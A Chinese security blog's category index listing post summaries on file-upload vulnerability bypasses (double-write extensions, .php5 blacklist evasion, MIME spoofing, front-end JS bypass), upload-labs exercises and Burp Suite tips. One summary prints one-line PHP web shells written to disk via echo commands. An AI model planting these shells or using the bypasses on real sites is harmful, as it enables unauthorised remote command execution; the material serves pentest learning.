随笔分类 -  Web安全

文件上传漏洞之过滤敏感文件扩展名
摘要:双写绕过:把filename.php修改为filename.pphphp 过滤掉php后就会变成filename.php 阅读全文
posted @ 2020-10-04 16:32 iZero 阅读(660) 评论(0) 推荐(0)
文件上传漏洞之黑名单验证
摘要:pass-03 只禁止了部分扩展名,还有.php5等扩展名可以解析为PHP。 上传.php5即可。 类似的扩展名有:php2,php3、php4、php5、phtml、等 阅读全文
posted @ 2020-10-04 12:23 iZero 阅读(562) 评论(0) 推荐(0)
文件上传漏洞之MIME类型过滤
摘要:上传的时候修改Content-Type为image/jpeg等程序指定的类型即可。 修改为: 使用蚁剑连接测试 阅读全文
posted @ 2020-10-04 12:20 iZero 阅读(651) 评论(0) 推荐(0)
命令执行写马的正确方式
摘要:Windows 错误写马 正确姿势 echo ^<?php @eval($_POST[cmd]);?^> > ./iii.txt Linux 正确写马方式 echo "<?php @eval(\$_POST['cmd']); ?>" > ./1.php 阅读全文
posted @ 2020-10-02 08:10 iZero 阅读(1620) 评论(0) 推荐(1)
无状态子域名爆破工具:ksubdomain
摘要:概述 开源地址:https://github.com/knownsec/ksubdomain 二进制文件下载:https://github.com/knownsec/ksubdomain/releases 在linux下,还需要安装libpcap-dev,在Windows下需要安装WinPcap,m 阅读全文
posted @ 2020-10-02 08:06 iZero 阅读(1764) 评论(0) 推荐(0)
burpsuite中文乱码问题
摘要:burpsuite中文乱码问题,无法匹配中文 阅读全文
posted @ 2020-03-03 06:00 iZero 阅读(10317) 评论(0) 推荐(0)
文件上传漏洞之js验证
摘要:0x00 前言 只有前端验证=没有验证 0x01 剔除JS 打开burpsuite,进入Proxy的Options,把Remove all JavaScript选上。 设置浏览器代理直接上传PHP木马即可。 0x02 上传截断修改扩展名 把PHP木马修改为jpg格式,然后上传,用burpsuite截 阅读全文
posted @ 2020-03-02 22:54 iZero 阅读(674) 评论(0) 推荐(0)
文件上传漏洞靶机upload-labs(1到10)
摘要:upload-labs,上传漏洞,一句话木马 阅读全文
posted @ 2020-03-02 22:52 iZero 阅读(1334) 评论(0) 推荐(0)
burpsuite常见问题
摘要:burpsuite,无法抓取HTTPS的包,无法抓取本地或局域网其他主机的包,SQL注入测试时出现500错误,但是在浏览器中是正常的,经过burpsuite无法上网,取消代理就正常 阅读全文
posted @ 2019-07-11 01:55 iZero 阅读(3672) 评论(0) 推荐(1)